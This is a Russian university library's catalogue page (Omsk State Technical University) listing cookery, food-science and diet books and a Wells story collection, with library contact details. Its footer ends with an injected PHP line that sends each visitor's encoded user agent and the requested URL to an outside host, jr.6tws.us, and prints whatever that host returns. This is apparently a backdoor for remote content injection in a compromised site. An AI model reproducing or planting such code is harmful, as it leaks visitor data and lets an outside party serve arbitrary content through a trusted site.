Медкова, Ирина Львовна. Сюрпризы вегетарианского стола [Текст] / И. Л. Медкова, Т. Н. Павлова, 1994. - 236, [1] с.
Держатели документа (Информация об экземплярах) 
37. 
Коснырева, Людмила Михайловна. Товароведение и экспертиза мяса и мясных товаров [Текст] / Л. М. Коснырева, В. И. Криштафович, В. М. Позняковский ; дар. О. Д. Худякова, 2007. - 319, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена товароведная характеристика мяса убойных животных и птицы, субпродуктов, колбасных изделий и мясных копченостей, консервов, мясных п/ф, куриных яиц и яичных продуктов. Описаны способы холодильной обработки мяса. Особое внимание уделено формированию качества мясных продуктов в процессе производства, а также изменению их потребительских свойств при хранении. Приведены классификация и характеристика основных групп мясных продуктов, требования к их качеству, экспертиза качества мяса и мясных товаров.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров (по областям применения), преподавателей, аспирантов, работников торговли.

38. 
Салаты и закуски [Текст] / сост. О. А. Воротникова ; дар. В. А. Козлова, 1995. - 395, [1] с.
Держатели документа (Информация об экземплярах) 
39. 
Рыбные блюда [Текст] / дар. В. А. Козлова, 1996. - 415 с.
Держатели документа (Информация об экземплярах) 
40. 
Хаят, Давид. Антираковая диета: Продукты, которые мы должны есть, чтобы защититься от опасного недуга [Текст] / Д. Хаят ; пер. О. А. Кутумина, 2017. - 285, [] с.
Держатели документа (Информация об экземплярах) 
41. 
Уэллс, Герберт Джордж. Человек-невидимка [Текст] / Г. Д. Уэллс ; пер.: Д. Вейс, К. Чуковский, Н. А. Волжина, 1983. - 253, [2] с.
Ключевые слова 
Оглавление 
  • Замечательный случай с глазами Дэвидсона
  • Хрустальное яйцо
  • Новейший ускоритель
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.91 с.26 запросов, 1.32c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;